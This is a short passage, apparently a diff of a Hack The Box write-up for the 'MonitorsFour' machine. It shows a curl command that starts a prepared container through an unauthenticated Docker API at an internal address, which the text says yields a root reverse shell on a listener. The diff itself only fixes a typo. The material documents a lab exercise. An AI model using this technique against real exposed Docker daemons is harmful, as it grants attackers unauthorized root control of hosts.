YOUSSEFWAEL54/HTB-machines/season 9/MonitorsFour/writeup.md

 ```
 curl -X POST http://192.168.65.7:2375/v1.44/containers/pwn123/start
 ```
-- run conatiner and booom in the listenr we have the revrse shell of root now have fun :)
+- run conatiner and booom in the listner we have the revrse shell of root now have fun :)